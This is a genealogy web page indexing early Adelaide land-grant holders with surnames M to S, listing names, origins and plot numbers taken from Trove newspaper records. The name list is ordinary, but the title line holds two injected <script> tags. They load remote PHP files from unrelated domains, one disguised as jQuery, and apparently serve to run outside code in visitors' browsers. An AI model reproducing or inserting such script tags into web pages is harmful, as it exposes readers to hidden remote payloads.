EARLY ADELAIDE. Survey and Land Grants. Names index M - S<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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EARLY ADELAIDE. Survey and Land Grants. Names index M - S

Journal by AliciaG

From Trove database of digitised Australian newspapers.
To read the original article follow this link.
The numbers beside each name relate to plot numbers, the article and accompanying map will help you locate where in Adelaide they are.

MAJOR, Daniel Bushnell 108,201-202
MAJOR, Daniel Bushnell of London 792
MALCOLM, Sir James of Carlisle 381,892
MALPAS, William of Adelaide 364
MARTIN, George 563-564,903,922-924
MASLIN, Thomas and William SHEPHERD 480
MASLIN, Thomas of Adelaide 766,795
MCLAREN, David of Adelaide 27, 40,83-84,196,398
MCHENRY, George of Adelaide 168-169
MCKENZIE, William and Isaac JACOBS 712
MCTAVISH, Dugald of Adelaide 194
MERCHANT, Charles Edmund of Halifax 209
MIDDLETON, George and Ben HOBSON 479
MIDDLETON, Joseph of Adelaide 473
MILDRED, Henry of Adelaide 760
MONINS, Richard of Walmer, Kent 326,331,339,978
MONK, John of Adelaide 696
MOORE, Edward of London 411-413,742-743
MORGAN, Rev. Thomas 1041
MORPHETT, John 612-614,660-661,771,828,883,976,981,1040
MORPHETT, John and Joseph DAVIES 605
MORPHETT, John of Adelaide 81,142,263,341,610,626,630,724,756,763,974
MORPHETT, George 462
MORPHETT, George of Islington 340, 606
MORPHETT, George of London 8,260,849
MORPHETT, Nathaniel of Halifax 7
MORRIS, Thomas of London 86,793
MOSELEY, Henry and Robert JACQUI 942
NICHOLSON, Thomas and John William Adams 1002
NODIN, John Perryman of London 46
OAKLEY, Josiah of Adelaide 651
ORMSBY, George Owen of Adelaide 52,767
OSBORNE, Henry of Adelaide 604
OVERTON, William of London 206
PARIS, Stephen of Adelaide 968
PARSONS, Edmund of Adelaide 129
PAYNE, Samuel of Wilts 47
PEARCE, William of Adelaide 159,539
PENTON, George 728
PETHERIDGE, Thomas Topham of Plymouth 138,173
PHARAZYN, Charles Johnson 528
PLAYFORD, Thomas of Adelaide 50
PRING, Daniel of Bedford Row 506
PROWSE, Jacob 895
PULLEN, William of the brig Rapid 105
RAWSON, Christopher of Halifax 131,363,436,554,598,677,975,1032-1033
RAWSON, Stansfield of Huddersfield 310
RAYNE, William Robert of Newcastle 406,709
READ, William 788
REAY, John of London 102-103
RICHARDS, George of the Royal George 632-633
RIGGE, John jun. of Middlesex 14
RIGGE, John of Sussex 979
ROBERTS, George of Adelaide 711
ROBERTS, George of Adelaide, surveyor 825
SANDFORD, Jonathon of London 402,1001
SHAW, Bernard and Edward of Chelsea 328
SHEPHERD, William and Thomas MASLIN 480
SHIPSTER, George Frederick of London 125
SIMONS, William Slade of Adelaide 182
SIMPSON, Alexander 62
SIMPSON, Daniel of Port Adelaide 878-880,887,925
SLADDEN, Basil of Adelaide 68
SLADDEN, Richard of Adelaide 104
SMART, Samuel of Adelaide 530,710
SMITH, George Robert 686
SMITH, George Robert of London 379-380
SMITH, John Abel of London 141,170,230-231,271-272,985-986
SMITH, Oswald of London 22,313,368,615,963
SMITH, Samuel 126
SMITH, Samuel of Halifax 16,49,181,218,397,401
SMITH, Samuel George 306,332
SMITH, Samuel George of Covent Garden 267
SMITH, Samuel George of London 39,317-319
SMITH, William Crosby 160
SMYTH, Hibernia of Adelaide, agriculturist 800
SNOOKE, John of London 529
SOLOMON, James of W. Maitland, N.S.W. 899
STEPHENS, Edward 846-848
STEPHENS, Edward of Adelaide 67,106,681,698-699,806-807,900
STEPHENS, Samuel of Adelaide 297,901-902
STEPHENS, William Henry and William HUMPREYS 758
STEVENS, Samuel 996-1000,1021-1025
STEVENSON, George of Adelaide 965-966,991-992
STEVENSON, John Robert 415
STRANGWAYS, Henry Bull 367,647
STRANGWAYS, Thomas Bewes 346-347,366,416-417,444
STUART, Charles William 889-890
STUART, Charles William of Adelaide 316
STUBBINGTON, James of Adelaide 488
STUCKEY, John of Adelaide 557
STUCKEY, William of Bristol 400,532
SURFLEN, Edward of Adelaide 487,946
SYMONDS, Richard Gilbert 302,393,489

Surnames: SMYTH
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on 2012-03-18 00:02:10

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